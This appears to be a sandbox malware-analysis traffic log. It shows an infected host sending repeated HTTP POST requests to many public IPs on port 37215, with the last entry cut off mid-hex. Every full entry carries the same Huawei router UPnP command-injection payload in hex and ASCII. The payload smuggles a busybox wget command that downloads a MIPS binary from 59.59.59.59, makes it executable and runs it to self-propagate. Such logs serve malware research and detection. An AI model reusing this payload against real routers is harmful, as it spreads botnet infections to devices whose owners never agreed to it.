                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          624192.168.2.1540278120.108.175.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605094910 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          625192.168.2.154062241.80.130.4737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605266094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          626192.168.2.1548018197.7.173.18837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605283976 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          627192.168.2.1538772197.121.91.2037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605298996 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          628192.168.2.154428419.166.94.12837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605312109 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          629192.168.2.154058636.94.65.12537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605324030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          630192.168.2.154567018.126.185.13737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605343103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          631192.168.2.1553812197.156.235.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605360031 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          632192.168.2.1545956197.75.177.9737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605381012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          633192.168.2.1541696176.216.120.3437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.605396032 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 